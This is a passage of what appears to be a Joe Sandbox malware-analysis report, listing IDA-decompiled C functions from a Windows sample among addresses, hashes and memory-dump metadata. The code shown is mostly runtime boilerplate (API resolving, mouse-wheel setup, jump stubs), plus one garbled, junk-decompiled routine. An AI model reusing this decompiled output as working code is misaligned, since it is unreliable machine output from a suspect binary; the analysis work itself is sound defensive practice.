                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: LocalTime
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 481472006-0
                                                                                                                                                                                          • Opcode ID: 5ffe458326757dd85ea2df27b30d14961029cbc5e3b0c2d63b65d9236bdd9a9f
                                                                                                                                                                                          • Instruction ID: a3b185b344278dcf1c9439e42592f718bf33603f87ac91d23c0fcb87781d4dc0
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5ffe458326757dd85ea2df27b30d14961029cbc5e3b0c2d63b65d9236bdd9a9f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 71D09E28409505A1C2007B15C85549FB7A4EE84740F808D5DF4D856391EB358595C79B
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00406E1D Relevance: .1, Instructions: 119COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 64%
                                                                                                                                                                                          			E00406E1D() {
				void* _t24;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				signed char _t29;
				signed char _t30;
				void* _t31;
				signed char _t32;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				intOrPtr* _t39;
				signed int _t41;
				signed int _t45;
				void* _t50;
				signed int _t51;
				void* _t54;
				signed int _t55;
				void* _t59;

				asm("outsb");
				_t25 = _t24 + 1;
				 *_t29 =  *_t29 + _t25;
				_t32 = _t31 +  *_t39;
				 *0 =  *0 ^ _t25;
				_t26 = _t25;
				 *_t26 =  *_t26 + _t26;
				asm("sbb al, 0x6e");
				_t27 = _t26 + 1;
				 *_t35 =  *_t35 + _t32;
				asm("outsd");
				_push(_t29);
				asm("gs insb");
				asm("arpl [gs:ebp+0x64], si");
				 *(_t37 + 0x64) =  *(_t37 + 0x64) | _t32;
				_t38 = _t37 + 1;
				_t50 = _t38;
				if(_t50 < 0) {
					L7:
					if(_t54 < 0) {
						L27:
						_t32 = _t32 +  *_t35;
						L28:
						 *((intOrPtr*)(_t29 - 0x17da0040)) =  *((intOrPtr*)(_t29 - 0x17da0040)) + _t32;
					}
					 *[fs:ebx] =  *[fs:ebx] ^ _t32;
					_t55 =  *[fs:ebx];
					L9:
					asm("outsd");
					_push(_t35);
					if(_t55 >= 0) {
						_t35 = _t35 - 1;
						 *((intOrPtr*)(_t29 - 0x13da0040)) =  *((intOrPtr*)(_t29 - 0x13da0040)) + _t32;
						goto ( *0x4a02ec);
						goto L27;
					}
					if(_t55 < 0) {
						_t30 = _t29 >> 0x25;
						goto ( *0x4a02e4);
					}
					_t32 = _t32 ^  *[fs:esi];
					asm("outsd");
					_t29 = _t29 + 1;
					asm("outsd");
					asm("insd");
					asm("bound ebp, [edi+0x42]");
					asm("outsd");
					if(_t29 < 0) {
						 *((intOrPtr*)(_t29 - 0xbda0040)) =  *((intOrPtr*)(_t29 - 0xbda0040)) + _t32;
						L23:
						goto ( *0x4a02f4);
					}
					L13:
					_t41 =  *(_t38 + _t27 + 0x57) * 0x6f646e69;
					if(_t41 > 0) {
						L33:
						L34:
						goto ( *0x4a02d8);
					}
					 *(_t41 + 0x40) =  *(_t41 + 0x40) >> 1;
					 *_t41 =  *_t41 + _t27;
					_t59 =  *_t41;
					asm("andps xmm1, [edi+0x77]");
					asm("outsb");
					if(_t59 < 0) {
						goto L28;
					}
					L15:
					if(_t59 < 0) {
						 *((intOrPtr*)(_t30 - 0x27da0040)) =  *((intOrPtr*)(_t30 - 0x27da0040)) + _t32;
						goto L33;
					}
					if(_t59 > 0) {
						goto ( *0x4a02e0);
					}
					if(_t59 == 0) {
						goto L34;
					}
					if(_t59 == 0) {
						goto ( *0x4a04a4);
					}
					 *((intOrPtr*)(_t29 + 0x425ffc0)) =  *((intOrPtr*)(_t29 + 0x425ffc0)) + _t32;
					goto ( *0x4a0304);
				}
				if(_t50 >= 0) {
					goto L9;
				}
				_t32 = _t32 |  *[fs:edi+0x64];
				 *(_t38 + 0x64) =  *(_t38 + 0x64) | _t45;
				_t30 = _t29 + 1;
				_push(0x656b6365);
				 *[fs:edi+0x64] =  *[fs:edi+0x64] | _t45;
				_t41 = 1 +  *(_t29 + 0x61) * 0x64656c62;
				asm("outsd");
				asm("arpl [ebp+0x73], si");
				 *[fs:edi+0x64] =  *[fs:edi+0x64] | _t45;
				_t51 =  *[fs:edi+0x64];
				asm("popa");
				if(_t51 != 0) {
					goto L15;
				}
				if(_t51 == 0) {
					L6:
					asm("outsb");
					asm("popad");
					asm("arpl [ecx+ebp*2+0x76], si");
					 *[gs:edi+0x64] =  *[gs:edi+0x64] | _t45;
					asm("outsd");
					_t32 = (_t32 |  *(_t38 + 0x64)) - 1 + 1;
					asm("arpl [ebx+0x65], sp");
					asm("insb");
					_t27 = _t27 | 0x6f4e646f;
					_t54 = _t41 - 1 + 1;
					asm("outsd");
					asm("arpl [ebp+0x73], si");
					_push(_t35);
					asm("arpl [gs:ebx+ecx+0x6f], si");
					_push(_t35);
					if(_t54 >= 0) {
						goto L23;
					}
					goto L7;
				}
				asm("outsd");
				_t27 = _t27 - 1;
				asm("outsd");
				if(_t27 == 0) {
					goto L13;
				}
				goto L6;
			}






















                                                                                                                                                                                          0x00406e1d
                                                                                                                                                                                          0x00406e1e
                                                                                                                                                                                          0x00406e1f
                                                                                                                                                                                          0x00406e21
                                                                                                                                                                                          0x00406e23
                                                                                                                                                                                          0x00406e29
                                                                                                                                                                                          0x00406e2b
                                                                                                                                                                                          0x00406e2d
                                                                                                                                                                                          0x00406e2f
                                                                                                                                                                                          0x00406e30
                                                                                                                                                                                          0x00406e32
                                                                                                                                                                                          0x00406e33
                                                                                                                                                                                          0x00406e35
                                                                                                                                                                                          0x00406e37
                                                                                                                                                                                          0x00406e3c
                                                                                                                                                                                          0x00406e3f
                                                                                                                                                                                          0x00406e3f
                                                                                                                                                                                          0x00406e40
                                                                                                                                                                                          0x00406ea3
                                                                                                                                                                                          0x00406ea3
                                                                                                                                                                                          0x00406f1b
                                                                                                                                                                                          0x00406f1b
                                                                                                                                                                                          0x00406f1d
                                                                                                                                                                                          0x00406f1d
                                                                                                                                                                                          0x00406f1d
                                                                                                                                                                                          0x00406ea5
                                                                                                                                                                                          0x00406ea5
                                                                                                                                                                                          0x00406ea9
                                                                                                                                                                                          0x00406ea9
                                                                                                                                                                                          0x00406eaa
                                                                                                                                                                                          0x00406eac
                                                                                                                                                                                          0x00406f14
                                                                                                                                                                                          0x00406f15
                                                                                                                                                                                          0x00406f18
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00406f18
                                                                                                                                                                                          0x00406eaf
                                                                                                                                                                                          0x00406f27
                                                                                                                                                                                          0x00406f28
                                                                                                                                                                                          0x00406f28
                                                                                                                                                                                          0x00406eb1
                                                                                                                                                                                          0x00406eb5
                                                                                                                                                                                          0x00406eb6
                                                                                                                                                                                          0x00406eb8
                                                                                                                                                                                          0x00406eb9
                                                                                                                                                                                          0x00406eba
                                                                                                                                                                                          0x00406ebd
                                                                                                                                                                                          0x00406ebe
                                                                                                                                                                                          0x00406f05
                                                                                                                                                                                          0x00406f08
                                                                                                                                                                                          0x00406f08
                                                                                                                                                                                          0x00406f08
                                                                                                                                                                                          0x00406ec1
                                                                                                                                                                                          0x00406ec1
                                                                                                                                                                                          0x00406ec9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00406f40
                                                                                                                                                                                          0x00406f40
                                                                                                                                                                                          0x00406f40
                                                                                                                                                                                          0x00406ecc
                                                                                                                                                                                          0x00406ecf
                                                                                                                                                                                          0x00406ecf
                                                                                                                                                                                          0x00406ed1
                                                                                                                                                                                          0x00406ed5
                                                                                                                                                                                          0x00406ed6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00406ed9
                                                                                                                                                                                          0x00406ed9
                                                                                                                                                                                          0x00406f3d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00406f3d
                                                                                                                                                                                          0x00406edb
                                                                                                                                                                                          0x00406f30
                                                                                                                                                                                          0x00406f30
                                                                                                                                                                                          0x00406edd
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00406edf
                                                                                                                                                                                          0x00406f48
                                                                                                                                                                                          0x00406f48
                                                                                                                                                                                          0x00406ee5
                                                                                                                                                                                          0x00406ee8
                                                                                                                                                                                          0x00406ee8
                                                                                                                                                                                          0x00406e42
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00406e44
                                                                                                                                                                                          0x00406e50
                                                                                                                                                                                          0x00406e53
                                                                                                                                                                                          0x00406e54
                                                                                                                                                                                          0x00406e59
                                                                                                                                                                                          0x00406e5d
                                                                                                                                                                                          0x00406e5e
                                                                                                                                                                                          0x00406e5f
                                                                                                                                                                                          0x00406e62
                                                                                                                                                                                          0x00406e62
                                                                                                                                                                                          0x00406e68
                                                                                                                                                                                          0x00406e6b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00406e6d
                                                                                                                                                                                          0x00406e79
                                                                                                                                                                                          0x00406e7d
                                                                                                                                                                                          0x00406e7e
                                                                                                                                                                                          0x00406e7f
                                                                                                                                                                                          0x00406e83
                                                                                                                                                                                          0x00406e88
                                                                                                                                                                                          0x00406e89
                                                                                                                                                                                          0x00406e8a
                                                                                                                                                                                          0x00406e8d
                                                                                                                                                                                          0x00406e8e
                                                                                                                                                                                          0x00406e93
                                                                                                                                                                                          0x00406e94
                                                                                                                                                                                          0x00406e95
                                                                                                                                                                                          0x00406e98
                                                                                                                                                                                          0x00406e99
                                                                                                                                                                                          0x00406e9e
                                                                                                                                                                                          0x00406ea0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00406ea0
                                                                                                                                                                                          0x00406e6f
                                                                                                                                                                                          0x00406e70
                                                                                                                                                                                          0x00406e72
                                                                                                                                                                                          0x00406e73
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 54f11dccd62813475a28973f54d63596b53e93d661755a465247151d0bbdba35
                                                                                                                                                                                          • Instruction ID: 41b5c857b1c5fd18c89c8e228dc287e94b26abbbc5cd349efe60712c552caa1b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 54f11dccd62813475a28973f54d63596b53e93d661755a465247151d0bbdba35
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D41C731009BC29BD7168F24EB65292FF60FB07354B1946FAC886669A3D339A921C74C
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040710E Relevance: .0, Instructions: 2COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E0040710E() {

				goto ( *0x4a03d0);
			}



                                                                                                                                                                                          0x00407110

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 6e3e926b6d06180d1e89f805d0cb4b26476465382a560504643e57a0bb9eeb36
                                                                                                                                                                                          • Instruction ID: 7ab3905d0b19a54db2499ef136ac9cefc830d3af45455a135820dfceb87ddde6
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6e3e926b6d06180d1e89f805d0cb4b26476465382a560504643e57a0bb9eeb36
                                                                                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00407136 Relevance: .0, Instructions: 2COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00407136() {

				goto ( *0x4a03bc);
			}



                                                                                                                                                                                          0x00407138

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 40f778af506237bd7661983379068ceecb53660c4f73c9f0704169219d8c38bb
                                                                                                                                                                                          • Instruction ID: de0749335127441f6f8a83c1245d187872a8c9e5d627d5fc5e4b6c64f3ed28c0
                                                                                                                                                                                          • Opcode Fuzzy Hash: 40f778af506237bd7661983379068ceecb53660c4f73c9f0704169219d8c38bb
                                                                                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040713E Relevance: .0, Instructions: 2COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E0040713E() {

				goto ( *0x4a03b8);
			}



                                                                                                                                                                                          0x00407140

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 365e1a23c77b6ac197e135ea6a15723a55c25d1518e85043317d7ec852d112f7
                                                                                                                                                                                          • Instruction ID: ddb22ed16564a2fe58fbb4a9f1b18441af0d5562c8b70fc5db97a678c33fff43
                                                                                                                                                                                          • Opcode Fuzzy Hash: 365e1a23c77b6ac197e135ea6a15723a55c25d1518e85043317d7ec852d112f7
                                                                                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040761E Relevance: .0, Instructions: 2COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E0040761E() {

				goto ( *0x4a0790);
			}



                                                                                                                                                                                          0x00407620

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: ddb2f4e379b4ad5740b486fab132155af43ceb2aee8cd1da0a388fc5cb67e84f
                                                                                                                                                                                          • Instruction ID: 1b6be7400ad42b3f1fcb0d5b5b800e8949a1016fec59b0b86c8b05b1aa957334
                                                                                                                                                                                          • Opcode Fuzzy Hash: ddb2f4e379b4ad5740b486fab132155af43ceb2aee8cd1da0a388fc5cb67e84f
                                                                                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00407686 Relevance: .0, Instructions: 2COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00407686() {

				goto ( *0x4a075c);
			}



                                                                                                                                                                                          0x00407688

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: bc24f87b5a14a631993ef6502de3b33b84ff028559359b7ee103afdff826113f
                                                                                                                                                                                          • Instruction ID: 905e961cf3b41af41537c3a9ea7e9b0f8243ac97d455408d0255fe67c71841b0
                                                                                                                                                                                          • Opcode Fuzzy Hash: bc24f87b5a14a631993ef6502de3b33b84ff028559359b7ee103afdff826113f
                                                                                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040F7D0 Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E0040F7D0() {
				struct HINSTANCE__* _v8;
				intOrPtr _t46;
				void* _t91;

				_v8 = GetModuleHandleA("oleaut32.dll");
				 *0x49e7a4 = E0040F7A4("VariantChangeTypeEx", 0x40f340, _t91);
				 *0x49e7a8 = E0040F7A4("VarNeg", 0x40f370, _t91);
				 *0x49e7ac = E0040F7A4("VarNot", 0x40f370, _t91);
				 *0x49e7b0 = E0040F7A4("VarAdd", E0040F37C, _t91);
				 *0x49e7b4 = E0040F7A4("VarSub", E0040F37C, _t91);
				 *0x49e7b8 = E0040F7A4("VarMul", E0040F37C, _t91);
				 *0x49e7bc = E0040F7A4("VarDiv", E0040F37C, _t91);
				 *0x49e7c0 = E0040F7A4("VarIdiv", E0040F37C, _t91);
				 *0x49e7c4 = E0040F7A4("VarMod", E0040F37C, _t91);
				 *0x49e7c8 = E0040F7A4("VarAnd", E0040F37C, _t91);
				 *0x49e7cc = E0040F7A4("VarOr", E0040F37C, _t91);
				 *0x49e7d0 = E0040F7A4("VarXor", E0040F37C, _t91);
				 *0x49e7d4 = E0040F7A4("VarCmp", E0040F388, _t91);
				 *0x49e7d8 = E0040F7A4("VarI4FromStr", E0040F394, _t91);
				 *0x49e7dc = E0040F7A4("VarR4FromStr", E0040F400, _t91);
				 *0x49e7e0 = E0040F7A4("VarR8FromStr", E0040F46C, _t91);
				 *0x49e7e4 = E0040F7A4("VarDateFromStr", E0040F4D8, _t91);
				 *0x49e7e8 = E0040F7A4("VarCyFromStr", E0040F544, _t91);
				 *0x49e7ec = E0040F7A4("VarBoolFromStr", E0040F5B0, _t91);
				 *0x49e7f0 = E0040F7A4("VarBstrFromCy", E0040F630, _t91);
				 *0x49e7f4 = E0040F7A4("VarBstrFromDate", E0040F6A0, _t91);
				_t46 = E0040F7A4("VarBstrFromBool", E0040F710, _t91);
				 *0x49e7f8 = _t46;
				return _t46;
			}






                                                                                                                                                                                          0x0040f7de
                                                                                                                                                                                          0x0040f7f2
                                                                                                                                                                                          0x0040f808
                                                                                                                                                                                          0x0040f81e
                                                                                                                                                                                          0x0040f834
                                                                                                                                                                                          0x0040f84a
                                                                                                                                                                                          0x0040f860
                                                                                                                                                                                          0x0040f876
                                                                                                                                                                                          0x0040f88c
                                                                                                                                                                                          0x0040f8a2
                                                                                                                                                                                          0x0040f8b8
                                                                                                                                                                                          0x0040f8ce
                                                                                                                                                                                          0x0040f8e4
                                                                                                                                                                                          0x0040f8fa
                                                                                                                                                                                          0x0040f910
                                                                                                                                                                                          0x0040f926
                                                                                                                                                                                          0x0040f93c
                                                                                                                                                                                          0x0040f952
                                                                                                                                                                                          0x0040f968
                                                                                                                                                                                          0x0040f97e
                                                                                                                                                                                          0x0040f994
                                                                                                                                                                                          0x0040f9aa
                                                                                                                                                                                          0x0040f9ba
                                                                                                                                                                                          0x0040f9c0
                                                                                                                                                                                          0x0040f9c7

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0040F7D9
                                                                                                                                                                                            • Part of subcall function 0040F7A4: GetProcAddress.KERNEL32(00000000), ref: 0040F7BD
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                                                          • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                                                                                                                          • API String ID: 1646373207-1918263038
                                                                                                                                                                                          • Opcode ID: 80ab367ea45039dbd2bc01dee9e52f96cbb8d261e3d937e86e9258942a4f4849
                                                                                                                                                                                          • Instruction ID: 068c6e066db7a12a78cda71ceaebb25bc6294a0e525a49770a7ca0196cea08b9
                                                                                                                                                                                          • Opcode Fuzzy Hash: 80ab367ea45039dbd2bc01dee9e52f96cbb8d261e3d937e86e9258942a4f4849
                                                                                                                                                                                          • Instruction Fuzzy Hash: 84411E656042049AD334EBAF794142A73C8D7D4724364C07FB804EBEE5DB7DA8498A2F
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00407B3C Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 61registryclipboardwindowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00407B3C(intOrPtr* __eax, int* __edx, intOrPtr* _a4, intOrPtr* _a8) {
				intOrPtr* _v8;
				struct HWND__* _t19;
				int* _t20;
				int* _t26;
				int* _t27;

				_t26 = _t20;
				_t27 = __edx;
				_v8 = __eax;
				_t19 = FindWindowA("MouseZ", "Magellan MSWHEEL");
				 *_v8 = RegisterClipboardFormatA("MSWHEEL_ROLLMSG");
				 *_t27 = RegisterClipboardFormatA("MSH_WHEELSUPPORT_MSG");
				 *_t26 = RegisterClipboardFormatA("MSH_SCROLL_LINES_MSG");
				if( *_t27 == 0 || _t19 == 0) {
					 *_a8 = 0;
				} else {
					 *_a8 = SendMessageA(_t19,  *_t27, 0, 0);
				}
				if( *_t26 == 0 || _t19 == 0) {
					 *_a4 = 3;
				} else {
					 *_a4 = SendMessageA(_t19,  *_t26, 0, 0);
				}
				return _t19;
			}








                                                                                                                                                                                          0x00407b43
                                                                                                                                                                                          0x00407b45
                                                                                                                                                                                          0x00407b47
                                                                                                                                                                                          0x00407b59
                                                                                                                                                                                          0x00407b68
                                                                                                                                                                                          0x00407b74
                                                                                                                                                                                          0x00407b80
                                                                                                                                                                                          0x00407b85
                                                                                                                                                                                          0x00407ba4
                                                                                                                                                                                          0x00407b8b
                                                                                                                                                                                          0x00407b9b
                                                                                                                                                                                          0x00407b9b
                                                                                                                                                                                          0x00407ba9
                                                                                                                                                                                          0x00407bc6
                                                                                                                                                                                          0x00407baf
                                                                                                                                                                                          0x00407bbf
                                                                                                                                                                                          0x00407bbf
                                                                                                                                                                                          0x00407bd3

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FindWindowA.USER32 ref: 00407B54
